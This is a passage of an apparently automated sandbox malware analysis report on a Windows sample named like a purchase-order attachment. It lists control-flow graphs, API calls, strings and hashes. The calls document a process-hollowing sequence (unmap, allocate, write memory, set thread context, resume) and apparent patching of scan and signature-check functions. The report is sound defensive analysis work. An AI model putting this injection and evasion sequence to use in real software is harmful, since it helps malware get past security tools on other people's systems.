2b146d4 call 2b289d0 6323->6397 6487 2b299e3-2b29a09 call 2b27a2c 6396->6487 6488 2b29a0b-2b29a77 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6396->6488 6424 2b29bf0-2b29d70 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 6397->6424 6424->6060 6529 2b29d76-2b29e6f call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28c80 6424->6529 6496 2b29a7c-2b29b73 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 6487->6496 6488->6496 6567 2b29b78-2b29b7d 6496->6567 6579 2b29ec3-2b2a61b call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 SetThreadContext NtResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12c2c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6529->6579 6580 2b29e71-2b29ebe call 2b28b78 call 2b28b6c 6529->6580 6567->6424 6805 2b2a620-2b2a8b2 call 2b2894c * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 5 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b28080 call 2b2894c * 2 6579->6805 6580->6579 6805->6060
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                                                                                                            • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000920,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
                                                                                                                                                                                                                            • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                                                                                                                            • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                                                                                                                            • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                                                                                                            • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                                                                                                          • SetThreadContext.KERNEL32(00000920,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,0000091C,002A4FF8,02B974FC,00000004,02B97500), ref: 02B2A317
                                                                                                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000920,00000000,00000920,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,0000091C,002A4FF8,02B974FC), ref: 02B2A324
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                          • API String ID: 2388221946-51457883
                                                                                                                                                                                                                          • Opcode ID: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                                                                                                                          • Instruction ID: d31b7ef75b706298cf3e94f47eca147920a51754cd1f8958eb4517a3c0f01932
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30E2E175A502289FDB11FB64DD80BCE73BAAF85300F9041F1E149AB215DE30AE89DF56
                                                                                                                                                                                                                          Function 02B28D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 6883 2b28d6e-2b28d73 6885 2b28d78-2b28d7d 6883->6885 6885->6885 6886 2b28d7f-2b28e66 call 2b14990 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6885->6886 6917 2b2a8b7-2b2a921 call 2b14500 * 2 call 2b14c60 call 2b14500 call 2b144dc call 2b14500 * 2 6886->6917 6918 2b28e6c-2b28f47 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6886->6918 6918->6917 6962 2b28f4d-2b29275 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b130d4 * 2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 call 2b14df0 call 2b28788 6918->6962 7071 2b29277-2b292e3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6962->7071 7072 2b292e8-2b29609 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12ee0 call 2b12f08 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2b2960f-2b29872 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28400 7072->7180 7253 2b29878-2b299e1 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28670 7180->7253 7254 2b29b7f-2b29beb call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 7180->7254 7344 2b299e3-2b29a09 call 2b27a2c 7253->7344 7345 2b29a0b-2b29a77 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 7253->7345 7281 2b29bf0-2b29d70 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 7254->7281 7281->6917 7386 2b29d76-2b29e6f call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28c80 7281->7386 7353 2b29a7c-2b29b7d call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 7344->7353 7345->7353 7353->7281 7436 2b29ec3-2b2a8b2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 SetThreadContext NtResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12c2c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 5 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b28080 call 2b2894c * 2 7386->7436 7437 2b29e71-2b29ebe call 2b28b78 call 2b28b6c 7386->7437 7436->6917 7437->7436
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                                                                                                            • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000920,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
                                                                                                                                                                                                                            • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                                                                                                                            • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                                                                                                                            • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                          • API String ID: 3386062106-51457883
                                                                                                                                                                                                                          • Opcode ID: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
                                                                                                                                                                                                                          • Instruction ID: b3f93cdda9a590f44b4faf4aaec77923743a965370e8e6dd3ad7c23c9ac1f0af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CE2D175A502289FDB11FB64DD80BCE73BAEF85300F9041E1E149AB215DE30AE89DF56
                                                                                                                                                                                                                          Function 02B15ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 10945 2b15acc-2b15b0d GetModuleFileNameA RegOpenKeyExA 10946 2b15b4f-2b15b92 call 2b15908 RegQueryValueExA 10945->10946 10947 2b15b0f-2b15b2b RegOpenKeyExA 10945->10947 10954 2b15b94-2b15bb0 RegQueryValueExA 10946->10954 10955 2b15bb6-2b15bd0 RegCloseKey 10946->10955 10947->10946 10948 2b15b2d-2b15b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2b15bd8-2b15c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10952 2b15cf2-2b15cf9 10950->10952 10953 2b15c0f-2b15c13 10950->10953 10957 2b15c15-2b15c19 10953->10957 10958 2b15c1f-2b15c35 lstrlenA 10953->10958 10954->10955 10959 2b15bb2 10954->10959 10957->10952 10957->10958 10960 2b15c38-2b15c3b 10958->10960 10959->10955 10961 2b15c47-2b15c4f 10960->10961 10962 2b15c3d-2b15c45 10960->10962 10961->10952 10964 2b15c55-2b15c5a 10961->10964 10962->10961 10963 2b15c37 10962->10963 10963->10960 10965 2b15c84-2b15c86 10964->10965 10966 2b15c5c-2b15c82 lstrcpynA LoadLibraryExA 10964->10966 10965->10952 10967 2b15c88-2b15c8c 10965->10967 10966->10965 10967->10952 10968 2b15c8e-2b15cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10952 10969 2b15cc0-2b15cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10952
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                          • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                          • Opcode ID: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
                                                                                                                                                                                                                          • Instruction ID: 7a2ce530077188beb64fcaa329d42f8f529dd1c126a4d666c34e84e99597f46f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB518771A5025C7AFB35DBA88C46FEFB7ADDB44744FC001E1AB44E6181D7749A448FA0
                                                                                                                                                                                                                          Function 02B2894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 13205 2b2894c-2b28971 LoadLibraryW 13206 2b28973-2b2898b GetProcAddress 13205->13206 13207 2b289bb-2b289c1 13205->13207 13208 2b289b0-2b289b6 FreeLibrary 13206->13208 13209 2b2898d-2b289ac call 2b27d78 13206->13209 13208->13207 13209->13208 13212 2b289ae 13209->13212 13212->13208
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                                                                                                            • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                                                                          • String ID: BCryptVerifySignature$bcrypt
